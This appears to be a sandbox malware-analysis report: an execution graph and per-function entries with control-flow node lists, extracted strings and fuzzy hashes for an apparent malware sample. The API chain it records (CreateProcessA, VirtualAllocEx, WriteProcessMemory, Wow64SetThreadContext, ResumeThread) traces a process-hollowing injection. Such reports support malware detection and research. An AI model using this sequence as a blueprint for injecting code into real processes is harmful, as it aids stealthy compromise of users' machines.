                                                                                                                                                          execution_graph 31695 1609ab0 31696 1609ac7 31695->31696 31697 1609ad8 31696->31697 31699 1609c38 31696->31699 31700 1609c5d 31699->31700 31704 1609d48 31700->31704 31708 1609d38 31700->31708 31706 1609d6f 31704->31706 31705 1609e4c 31706->31705 31712 16098c0 31706->31712 31710 1609d6f 31708->31710 31709 1609e4c 31709->31709 31710->31709 31711 16098c0 CreateActCtxA 31710->31711 31711->31709 31713 160add8 CreateActCtxA 31712->31713 31715 160ae9b 31713->31715 31443 18d4888 31444 18d4a13 31443->31444 31446 18d48ae 31443->31446 31446->31444 31447 18d4484 31446->31447 31448 18d4b08 PostMessageW 31447->31448 31449 18d4b74 31448->31449 31449->31446 31450 18d1d2b 31451 18d1cd7 31450->31451 31452 18d1a40 31451->31452 31456 18d320e 31451->31456 31476 18d31b0 31451->31476 31495 18d31a1 31451->31495 31458 18d3211 31456->31458 31459 18d319c 31456->31459 31457 18d31ec 31457->31452 31458->31452 31459->31457 31514 18d388c 31459->31514 31519 18d3d12 31459->31519 31524 18d3933 31459->31524 31529 18d38b3 31459->31529 31534 18d3876 31459->31534 31539 18d3894 31459->31539 31544 18d371e 31459->31544 31549 18d399f 31459->31549 31554 18d38fc 31459->31554 31559 18d359c 31459->31559 31564 18d3862 31459->31564 31569 18d34e0 31459->31569 31575 18d3a0a 31459->31575 31579 18d378b 31459->31579 31585 18d4088 31459->31585 31589 18d3ace 31459->31589 31477 18d31ca 31476->31477 31479 18d388c 2 API calls 31477->31479 31480 18d3ace 2 API calls 31477->31480 31481 18d4088 2 API calls 31477->31481 31482 18d378b 2 API calls 31477->31482 31483 18d3a0a 2 API calls 31477->31483 31484 18d34e0 2 API calls 31477->31484 31485 18d3862 2 API calls 31477->31485 31486 18d359c 2 API calls 31477->31486 31487 18d38fc 2 API calls 31477->31487 31488 18d399f 2 API calls 31477->31488 31489 18d371e 2 API calls 31477->31489 31490 18d3894 2 API calls 31477->31490 31491 18d3876 2 API calls 31477->31491 31492 18d38b3 2 API calls 31477->31492 31493 18d3933 2 API calls 31477->31493 31494 18d3d12 2 API calls 31477->31494 31478 18d31ee 31478->31452 31479->31478 31480->31478 31481->31478 31482->31478 31483->31478 31484->31478 31485->31478 31486->31478 31487->31478 31488->31478 31489->31478 31490->31478 31491->31478 31492->31478 31493->31478 31494->31478 31496 18d31ca 31495->31496 31498 18d388c 2 API calls 31496->31498 31499 18d3ace 2 API calls 31496->31499 31500 18d4088 2 API calls 31496->31500 31501 18d378b 2 API calls 31496->31501 31502 18d3a0a 2 API calls 31496->31502 31503 18d34e0 2 API calls 31496->31503 31504 18d3862 2 API calls 31496->31504 31505 18d359c 2 API calls 31496->31505 31506 18d38fc 2 API calls 31496->31506 31507 18d399f 2 API calls 31496->31507 31508 18d371e 2 API calls 31496->31508 31509 18d3894 2 API calls 31496->31509 31510 18d3876 2 API calls 31496->31510 31511 18d38b3 2 API calls 31496->31511 31512 18d3933 2 API calls 31496->31512 31513 18d3d12 2 API calls 31496->31513 31497 18d31ee 31497->31452 31498->31497 31499->31497 31500->31497 31501->31497 31502->31497 31503->31497 31504->31497 31505->31497 31506->31497 31507->31497 31508->31497 31509->31497 31510->31497 31511->31497 31512->31497 31513->31497 31515 18d38ba 31514->31515 31594 18d1458 31515->31594 31598 18d1452 31515->31598 31516 18d37c9 31516->31457 31520 18d3d1b 31519->31520 31602 18d1368 31520->31602 31606 18d1360 31520->31606 31521 18d3e39 31521->31457 31525 18d4082 31524->31525 31526 18d409b 31525->31526 31610 18d4348 31525->31610 31615 18d4358 31525->31615 31530 18d38b9 31529->31530 31531 18d37c9 31530->31531 31532 18d1458 ReadProcessMemory 31530->31532 31533 18d1452 ReadProcessMemory 31530->31533 31531->31457 31532->31531 31533->31531 31535 18d3883 31534->31535 31628 18d422f 31535->31628 31634 18d4240 31535->31634 31536 18d3bad 31536->31457 31540 18d38a1 31539->31540 31542 18d1368 WriteProcessMemory 31540->31542 31543 18d1360 WriteProcessMemory 31540->31543 31541 18d39de 31541->31457 31542->31541 31543->31541 31545 18d3732 31544->31545 31547 18d0d98 Wow64SetThreadContext 31545->31547 31548 18d0d90 Wow64SetThreadContext 31545->31548 31546 18d3bdd 31547->31546 31548->31546 31550 18d39a5 31549->31550 31552 18d1368 WriteProcessMemory 31550->31552 31553 18d1360 WriteProcessMemory 31550->31553 31551 18d39de 31551->31457 31552->31551 31553->31551 31555 18d389d 31554->31555 31557 18d1368 WriteProcessMemory 31555->31557 31558 18d1360 WriteProcessMemory 31555->31558 31556 18d39de 31556->31457 31557->31556 31558->31556 31560 18d35a8 31559->31560 31647 18d15e6 31560->31647 31651 18d15f0 31560->31651 31565 18d386f 31564->31565 31655 18d0ce1 31565->31655 31659 18d0ce8 31565->31659 31566 18d3eb3 31571 18d3513 31569->31571 31570 18d4141 31570->31457 31571->31570 31573 18d15e6 CreateProcessA 31571->31573 31574 18d15f0 CreateProcessA 31571->31574 31572 18d36ff 31572->31457 31573->31572 31574->31572 31577 18d1368 WriteProcessMemory 31575->31577 31578 18d1360 WriteProcessMemory 31575->31578 31576 18d3a38 31577->31576 31578->31576 31580 18d37aa 31579->31580 31581 18d3733 31579->31581 31580->31457 31583 18d0d98 Wow64SetThreadContext 31581->31583 31584 18d0d90 Wow64SetThreadContext 31581->31584 31582 18d3bdd 31583->31582 31584->31582 31587 18d4348 2 API calls 31585->31587 31588 18d4358 2 API calls 31585->31588 31586 18d409b 31587->31586 31588->31586 31590 18d3ad4 31589->31590 31592 18d0ce8 ResumeThread 31590->31592 31593 18d0ce1 ResumeThread 31590->31593 31591 18d3eb3 31592->31591 31593->31591 31595 18d14a3 ReadProcessMemory 31594->31595 31597 18d14e7 31595->31597 31597->31516 31599 18d14a3 ReadProcessMemory 31598->31599 31601 18d14e7 31599->31601 31601->31516 31603 18d13b0 WriteProcessMemory 31602->31603 31605 18d1407 31603->31605 31605->31521 31607 18d13b0 WriteProcessMemory 31606->31607 31609 18d1407 31607->31609 31609->31521 31611 18d4358 31610->31611 31620 18d0d98 31611->31620 31624 18d0d90 31611->31624 31612 18d4383 31612->31526 31616 18d436d 31615->31616 31618 18d0d98 Wow64SetThreadContext 31616->31618 31619 18d0d90 Wow64SetThreadContext 31616->31619 31617 18d4383 31617->31526 31618->31617 31619->31617 31621 18d0dd1 Wow64SetThreadContext 31620->31621 31623 18d0e25 31621->31623 31623->31612 31625 18d0d96 Wow64SetThreadContext 31624->31625 31627 18d0e25 31625->31627 31627->31612 31629 18d423a 31628->31629 31630 18d428f 31628->31630 31639 18d12a8 31629->31639 31643 18d12a0 31629->31643 31630->31536 31631 18d4274 31631->31536 31635 18d4255 31634->31635 31637 18d12a8 VirtualAllocEx 31635->31637 31638 18d12a0 VirtualAllocEx 31635->31638 31636 18d4274 31636->31536 31637->31636 31638->31636 31640 18d12e8 VirtualAllocEx 31639->31640 31642 18d1325 31640->31642 31642->31631 31644 18d12e8 VirtualAllocEx 31643->31644 31646 18d1325 31644->31646 31646->31631 31648 18d1679 CreateProcessA 31647->31648 31650 18d183b 31648->31650 31650->31650 31652 18d1679 CreateProcessA 31651->31652 31654 18d183b 31652->31654 31654->31654 31656 18d0ce6 ResumeThread 31655->31656 31658 18d0d59 31656->31658 31658->31566 31660 18d0d28 ResumeThread 31659->31660 31662 18d0d59 31660->31662 31662->31566 31663 5863930 DuplicateHandle 31664 58639c6 31663->31664 31665 5867ab0 31666 5867b18 CreateWindowExW 31665->31666 31668 5867bd4 31666->31668 31716 586a1d0 31717 586a242 31716->31717 31718 586a2ec 31716->31718 31720 586a29a CallWindowProcW 31717->31720 31721 586a249 31717->31721 31722 5865524 31718->31722 31720->31721 31723 586552f 31722->31723 31725 5868a29 31723->31725 31726 586564c CallWindowProcW 31723->31726 31726->31725 31727 14ad01c 31728 14ad034 31727->31728 31729 14ad08e 31728->31729 31730 5865524 CallWindowProcW 31728->31730 31734 5867c68 31728->31734 31738 5867c58 31728->31738 31742 58689c8 31728->31742 31730->31729 31735 5867c8e 31734->31735 31736 5865524 CallWindowProcW 31735->31736 31737 5867caf 31736->31737 31737->31729 31739 5867c8e 31738->31739 31740 5865524 CallWindowProcW 31739->31740 31741 5867caf 31740->31741 31741->31729 31744 5868a05 31742->31744 31745 5868a29 31744->31745 31746 586564c CallWindowProcW 31744->31746 31746->31745 31757 18d1c74 31758 18d1a0c 31757->31758 31759 18d1a40 31758->31759 31760 18d320e 12 API calls 31758->31760 31761 18d31a1 12 API calls 31758->31761 31762 18d31b0 12 API calls 31758->31762 31760->31759 31761->31759 31762->31759 31669 5860f48 31670 5860f57 31669->31670 31673 5861030 31669->31673 31682 5861040 31669->31682 31674 5861051 31673->31674 31675 5861074 31673->31675 31679 5861030 2 API calls 31674->31679 31680 5861040 2 API calls 31674->31680 31691 5861230 31674->31691 31675->31670 31676 586105c 31676->31675 31677 5861278 GetModuleHandleW 31676->31677 31678 58612a5 31677->31678 31678->31670 31679->31676 31680->31676 31683 5861051 31682->31683 31684 5861074 31682->31684 31688 5861030 2 API calls 31683->31688 31689 5861040 2 API calls 31683->31689 31690 5861230 GetModuleHandleW 31683->31690 31684->31670 31685 5861278 GetModuleHandleW 31686 58612a5 31685->31686 31686->31670 31687 586105c 31687->31684 31687->31685 31688->31687 31689->31687 31690->31687 31692 5861272 31691->31692 31693 5861278 GetModuleHandleW 31691->31693 31692->31693 31694 58612a5 31693->31694 31694->31676 31747 58636e8 31748 586372e GetCurrentProcess 31747->31748 31750 5863780 GetCurrentThread 31748->31750 31751 5863779 31748->31751 31752 58637b6 31750->31752 31753 58637bd GetCurrentProcess 31750->31753 31751->31750 31752->31753 31756 58637f3 31753->31756 31754 586381b GetCurrentThreadId 31755 586384c 31754->31755 31756->31754

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 08920B61 Relevance: 2.7, Strings: 2, Instructions: 190COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 573 8920b61-8920b93 575 8920b95 573->575 576 8920b9a-8920c40 573->576 575->576 583 8920c41 576->583 584 8920c48-8920c64 583->584 585 8920c66 584->585 586 8920c6d-8920c6e 584->586 585->583 585->586 587 8920c73-8920ca9 585->587 588 8920d60-8920dd0 585->588 589 8920d16-8920d1c 585->589 590 8920cf5-8920d11 585->590 591 8920d3b-8920d5b 585->591 592 8920cab-8920caf 585->592 593 8920cdb-8920cf0 585->593 586->588 587->584 607 8920dd2 call 8921c90 588->607 608 8920dd2 call 8921d50 588->608 609 8920dd2 call 8922940 588->609 610 8920dd2 call 8921dc1 588->610 611 8920dd2 call 8921dd4 588->611 612 8920dd2 call 8922958 588->612 613 8920dd2 call 8921c8f 588->613 605 8920d1e call 89212d8 589->605 606 8920d1e call 89212c9 589->606 590->584 591->584 594 8920cc2-8920cc9 592->594 595 8920cb1-8920cc0 592->595 593->584 600 8920cd0-8920cd6 594->600 595->600 597 8920d24-8920d36 597->584 600->584 604 8920dd8-8920de2 605->597 606->597 607->604 608->604 609->604 610->604 611->604 612->604 613->604
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Tekq$Tekq
                                                                                                                                                          • API String ID: 0-2269808460
                                                                                                                                                          • Opcode ID: bc91940d0a88fadc3986bee83f9ad9b0b5a027b0eb0f2f0156b99f0ec661acbc
                                                                                                                                                          • Instruction ID: e1da4375546ef851cc7bd2a8b2659f145d83a826fc4d9d0794d418ceb32ee9e6
                                                                                                                                                          • Opcode Fuzzy Hash: bc91940d0a88fadc3986bee83f9ad9b0b5a027b0eb0f2f0156b99f0ec661acbc
                                                                                                                                                          • Instruction Fuzzy Hash: 7681E5B4E00659CFCB08DFE9C884A9EFBB2FF89300F24852AD919AB364D7345905CB50
                                                                                                                                                          Function 08920B70 Relevance: 2.7, Strings: 2, Instructions: 189COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 614 8920b70-8920b93 615 8920b95 614->615 616 8920b9a-8920c40 614->616 615->616 623 8920c41 616->623 624 8920c48-8920c64 623->624 625 8920c66 624->625 626 8920c6d-8920c6e 624->626 625->623 625->626 627 8920c73-8920ca9 625->627 628 8920d60-8920dd0 625->628 629 8920d16-8920d1c 625->629 630 8920cf5-8920d11 625->630 631 8920d3b-8920d5b 625->631 632 8920cab-8920caf 625->632 633 8920cdb-8920cf0 625->633 626->628 627->624 647 8920dd2 call 8921c90 628->647 648 8920dd2 call 8921d50 628->648 649 8920dd2 call 8922940 628->649 650 8920dd2 call 8921dc1 628->650 651 8920dd2 call 8921dd4 628->651 652 8920dd2 call 8922958 628->652 653 8920dd2 call 8921c8f 628->653 645 8920d1e call 89212d8 629->645 646 8920d1e call 89212c9 629->646 630->624 631->624 634 8920cc2-8920cc9 632->634 635 8920cb1-8920cc0 632->635 633->624 640 8920cd0-8920cd6 634->640 635->640 637 8920d24-8920d36 637->624 640->624 644 8920dd8-8920de2 645->637 646->637 647->644 648->644 649->644 650->644 651->644 652->644 653->644
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Tekq$Tekq
                                                                                                                                                          • API String ID: 0-2269808460
                                                                                                                                                          • Opcode ID: 11d9e6a0082c8b3a1764398628b69f21afbc6c1afef03949f7cb491ca4a1d4dd
                                                                                                                                                          • Instruction ID: 464711363d19a82601926936dd13fb3a553fa00ef8077d6fc52b4d113666c4da
                                                                                                                                                          • Opcode Fuzzy Hash: 11d9e6a0082c8b3a1764398628b69f21afbc6c1afef03949f7cb491ca4a1d4dd
                                                                                                                                                          • Instruction Fuzzy Hash: 8181C3B4E00619CFDB48DFE9C984A9EFBB2FF89301F24852AD919AB358D7345905CB50
                                                                                                                                                          Function 08926198 Relevance: 2.7, Strings: 2, Instructions: 165COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 654 8926198-89261ba 655 89261c1-89261e6 654->655 656 89261bc 654->656 657 89261e7 655->657 656->655 658 89261ee-892620a 657->658 659 8926213-8926214 658->659 660 892620c 658->660 661 89263c4-89263cd 659->661 662 8926219-8926258 659->662 660->657 660->661 660->662 663 8926331-8926335 660->663 664 89262f5-892631e 660->664 665 892625a-8926294 660->665 666 892639b-89263bf 660->666 667 8926299-892629e 660->667 668 89262de-89262f0 660->668 669 8926383-8926396 660->669 670 8926323-892632c 660->670 671 89262c7-89262d9 660->671 672 8926368-892637e 660->672 662->658 673 8926337-8926346 663->673 674 8926348-892634f 663->674 664->658 665->658 666->658 679 89262a7-89262c2 667->679 668->658 669->658 670->658 671->658 672->658 676 8926356-8926363 673->676 674->676 676->658 679->658
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: \~$$or
                                                                                                                                                          • API String ID: 0-2796768027
                                                                                                                                                          • Opcode ID: 0db6d84f25d684c6ad434e24a8d14efcf28fae9c1c52af4dab996587d22d8fed
                                                                                                                                                          • Instruction ID: d2790bddf79aac94cbd6bb672019e9dc419fce5da3b5f6625d9fb752b2c4ffdb
                                                                                                                                                          • Opcode Fuzzy Hash: 0db6d84f25d684c6ad434e24a8d14efcf28fae9c1c52af4dab996587d22d8fed
                                                                                                                                                          • Instruction Fuzzy Hash: BE6115B5E0521ADBCB18DFE6D5816AEFBF2AF88301F10942AD415E7258D734AA41CF90
                                                                                                                                                          Function 08926195 Relevance: 2.7, Strings: 2, Instructions: 163COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 727 8926195-89261ba 729 89261c1-89261e6 727->729 730 89261bc 727->730 731 89261e7 729->731 730->729 732 89261ee-892620a 731->732 733 8926213-8926214 732->733 734 892620c 732->734 735 89263c4-89263cd 733->735 736 8926219-8926258 733->736 734->731 734->735 734->736 737 8926331-8926335 734->737 738 89262f5-892631e 734->738 739 892625a-8926294 734->739 740 892639b-89263bf 734->740 741 8926299-892629e 734->741 742 89262de-89262f0 734->742 743 8926383-8926396 734->743 744 8926323-892632c 734->744 745 89262c7-89262d9 734->745 746 8926368-892637e 734->746 736->732 747 8926337-8926346 737->747 748 8926348-892634f 737->748 738->732 739->732 740->732 753 89262a7-89262c2 741->753 742->732 743->732 744->732 745->732 746->732 750 8926356-8926363 747->750 748->750 750->732 753->732
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: \~$$or
                                                                                                                                                          • API String ID: 0-2796768027
                                                                                                                                                          • Opcode ID: 2ea189518188b8c52765c09b0513f4d09207bf2efe76d646179d213cdc60de3a
                                                                                                                                                          • Instruction ID: 71210df82e8a864bffd93ec84fbed8e8b73a694bc3a0eac4c04b021bcaa34757
                                                                                                                                                          • Opcode Fuzzy Hash: 2ea189518188b8c52765c09b0513f4d09207bf2efe76d646179d213cdc60de3a
                                                                                                                                                          • Instruction Fuzzy Hash: 406116B5E0521ADFCB18DFE6D5816AEFBF2AF88301F10942AD415E7258D734AA41CF90
                                                                                                                                                          Function 08927B10 Relevance: 1.5, Strings: 1, Instructions: 270COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ?w=>
                                                                                                                                                          • API String ID: 0-1933253675
                                                                                                                                                          • Opcode ID: 9d6cd47fe2efa44d9825dbcafd4c737a93ac32b75813eb1b8c9a74375aaf9771
                                                                                                                                                          • Instruction ID: 639c224b346f982082e89719d1b7dccfbf89dd5555c4bda7b2082edd3a326109
                                                                                                                                                          • Opcode Fuzzy Hash: 9d6cd47fe2efa44d9825dbcafd4c737a93ac32b75813eb1b8c9a74375aaf9771
                                                                                                                                                          • Instruction Fuzzy Hash: 06B119B0D06229DBDB18DFE6D88059EFBB2FF88311F10956AD415BB218DB349902CF54
                                                                                                                                                          Function 08927B0C Relevance: 1.5, Strings: 1, Instructions: 267COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ?w=>
                                                                                                                                                          • API String ID: 0-1933253675
                                                                                                                                                          • Opcode ID: cd26485399de9f24556e2c2106dd5ff0c825b0027f2963ed90fdc6daa2d953b9
                                                                                                                                                          • Instruction ID: 947f5e9d2a06e4054fef9739282859fcddab91b49de610be967303ea75f1cbbf
                                                                                                                                                          • Opcode Fuzzy Hash: cd26485399de9f24556e2c2106dd5ff0c825b0027f2963ed90fdc6daa2d953b9
                                                                                                                                                          • Instruction Fuzzy Hash: E4B1F6B0D06229EBDB18DFE6D8405AEFBB2FF89211F10956AD415BB258DB349902CF50
                                                                                                                                                          Function 08927260 Relevance: 1.5, Strings: 1, Instructions: 208COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: j4$y
                                                                                                                                                          • API String ID: 0-2391584009
                                                                                                                                                          • Opcode ID: c1dd1c5c7f16608224e5961bf7bfa42940f9f9fb3e8ee5a5bce3271ea8b0968d
                                                                                                                                                          • Instruction ID: 810f41221a2ffb4f2fe964b1bbc08ba61e0dfc3d5da299aa0e6b1879335b9835
                                                                                                                                                          • Opcode Fuzzy Hash: c1dd1c5c7f16608224e5961bf7bfa42940f9f9fb3e8ee5a5bce3271ea8b0968d
                                                                                                                                                          • Instruction Fuzzy Hash: 1A81E671D05219EFCB08CFE6D58099EFBB6EF89311F20982AE415BB268D7349542CF54
                                                                                                                                                          Function 08927250 Relevance: 1.5, Strings: 1, Instructions: 207COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: j4$y
                                                                                                                                                          • API String ID: 0-2391584009
                                                                                                                                                          • Opcode ID: 3eae310fc9a4f2d8f1a138e48717422333fbfeb8221f7edea93989eccebeb5ca
                                                                                                                                                          • Instruction ID: 2ec494e2a4fcd9c4c21e6d212a61ab3c6d3b009ac450c218b7b13251a9be25f4
                                                                                                                                                          • Opcode Fuzzy Hash: 3eae310fc9a4f2d8f1a138e48717422333fbfeb8221f7edea93989eccebeb5ca
                                                                                                                                                          • Instruction Fuzzy Hash: 6C81E671D05219EFCB08DFE6D58099EFBB6EF99311F20982AE415BB268D7349946CF00
                                                                                                                                                          Function 08925BF5 Relevance: .2, Instructions: 152COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 4d4c5392a2b4225de439a71c22b212fec03e30df45505cb059c55d9e5f4b75ca
                                                                                                                                                          • Instruction ID: 43c86d91e28dac055b5971dfaa05bf69d5a5fff50904bd7e728e04be84d5621f
                                                                                                                                                          • Opcode Fuzzy Hash: 4d4c5392a2b4225de439a71c22b212fec03e30df45505cb059c55d9e5f4b75ca
                                                                                                                                                          • Instruction Fuzzy Hash: ED5108B4E0121ADFCB48DFA5D9459AEFBB2FF89311F10982AD415E7254EB389A01CF50
                                                                                                                                                          Function 08925BF8 Relevance: .2, Instructions: 152COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: a43bc7752139e864bd6f8c21e764b0bcdbf9604df61b270c0b4054731627678e
                                                                                                                                                          • Instruction ID: e0655120c9ca0c22eb0ef91665074a28f3c310f6825fe024f6912f74836bac5a
                                                                                                                                                          • Opcode Fuzzy Hash: a43bc7752139e864bd6f8c21e764b0bcdbf9604df61b270c0b4054731627678e
                                                                                                                                                          • Instruction Fuzzy Hash: 2C5108B0E0121ADFCB48DFA5D9459AEFBB2FF89311F10982AD415E7254EB349A01CF50
                                                                                                                                                          Function 089212D8 Relevance: .1, Instructions: 121COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: dab104fc2464dd0ec71efe3b58162972c883401d4abfab7dc12407983623ff7d
                                                                                                                                                          • Instruction ID: d02055061d4af50df70c40648febc5818b56c29b63f6ba369e4c1b83accbd895
                                                                                                                                                          • Opcode Fuzzy Hash: dab104fc2464dd0ec71efe3b58162972c883401d4abfab7dc12407983623ff7d
                                                                                                                                                          • Instruction Fuzzy Hash: E54145B0E05219CFCB08DFAAD8406AEFBF2EF88301F14D46AD419A7254DB349951CF64
                                                                                                                                                          Function 089212C9 Relevance: .1, Instructions: 120COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 3ccb41cf94b5083cafdc7da4d65b6ca678a6f080b3625be80f8a6fdf9bc11ef6
                                                                                                                                                          • Instruction ID: 609810e5e8aebc431a956cafe116302da02e37d9b8485825e6e6e5e446acfaec
                                                                                                                                                          • Opcode Fuzzy Hash: 3ccb41cf94b5083cafdc7da4d65b6ca678a6f080b3625be80f8a6fdf9bc11ef6
                                                                                                                                                          • Instruction Fuzzy Hash: 564146B4E05219CFCB08CFAAC8406AEFBF2EF88301F24D46AD419A7255DB309951CF64
                                                                                                                                                          Function 08921C90 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 63320bcadcb1851b754064b5609b8d7931969921f582fe8503a471aba211c540
                                                                                                                                                          • Instruction ID: 0b12ebe670182c0beb3bedbbefd2460587cad22702a715146739a98f309d3340
                                                                                                                                                          • Opcode Fuzzy Hash: 63320bcadcb1851b754064b5609b8d7931969921f582fe8503a471aba211c540
                                                                                                                                                          • Instruction Fuzzy Hash: F4310475E01618CBDB18CFAAD94469EBBB3EFC9311F14C1A9E409AB358DB315A81CF40
                                                                                                                                                          Function 08920040 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b60d48b90f116840ab6df5be99710c1deaf3339073e7570da193943b75755656
                                                                                                                                                          • Instruction ID: 70f83387c2420a7ed2f6aa96ef7f0eafa9afb2fee4113154f789269dd0d650f9
                                                                                                                                                          • Opcode Fuzzy Hash: b60d48b90f116840ab6df5be99710c1deaf3339073e7570da193943b75755656
